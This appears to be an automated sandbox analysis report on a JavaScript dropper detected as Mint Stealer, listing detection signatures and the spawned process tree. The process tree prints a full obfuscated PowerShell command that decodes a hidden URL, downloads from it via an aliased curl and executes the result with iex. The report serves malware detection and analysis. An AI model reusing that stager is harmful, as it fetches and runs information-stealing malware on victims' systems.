Edit tour
Windows
Analysis Report
_DRP12938938231_PDF.js
Overview
General Information
Detection
Mint Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Creates processes via WMI
Loading BitLocker PowerShell Module
Obfuscated command line found
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64native
- wscript.exe (PID: 7552 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\_DRP1 2938938231 _PDF.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1) - conhost.exe (PID: 7372 cmdline:
conhost -- headless p owershell $xyhqerilk pf='ur' ;n ew-alias p rintout c$ ($xyhqeril kpf)l;$rlg ibutmdjea= (8606,8593 ,8596,8589 ,8595,8613 ,8608,8542 ,8608,8589 ,8595,8613 ,8588,8537 ,8607,8602 ,8603,8538 ,8540,8537 ,8603,8595 ,8603,8554 ,8606,8552 ,8600,8596 ,8601,8607 ,8606,8541 ,8540);$pw zlqamobsvi r=('bronx' ,'get-cmdl et');$fgnc dqhom=$rlg ibutmdjea; foreach($z awohn in $ fgncdqhom) {$iegjlbcr =$zawohn;$ robvxc=$ro bvxc+[char ]($iegjlbc r-8491);$t ozjeb=$rob vxc; $jvdh bt=$tozjeb };$vdtwhne bils[2]=$j vdhbt;$nmb tsery='rl' ;$qcmshfko tzdnwr=1;. $([char](9 992-9887)+ 'e'+'x')(p rintout -u seb $jvdhb t) MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 1796 cmdline:
powershell $xyhqeril kpf='ur' ; new-alias printout c $($xyhqeri lkpf)l;$rl gibutmdjea =(8606,859 3,8596,858 9,8595,861 3,8608,854 2,8608,858 9,8595,861 3,8588,853 7,8607,860 2,8603,853 8,8540,853 7,8603,859 5,8603,855 4,8606,855 2,8600,859 6,8601,860 7,8606,854 1,8540);$p wzlqamobsv ir=('bronx ','get-cmd let');$fgn cdqhom=$rl gibutmdjea ;foreach($ zawohn in $fgncdqhom ){$iegjlbc r=$zawohn; $robvxc=$r obvxc+[cha r]($iegjlb cr-8491);$ tozjeb=$ro bvxc; $jvd hbt=$tozje b};$vdtwhn ebils[2]=$ jvdhbt;$nm btsery='rl ';$qcmshfk otzdnwr=1; .$([char]( 9992-9887) +'e'+'x')( printout - useb $jvdh bt) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
System Summary |
---|
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |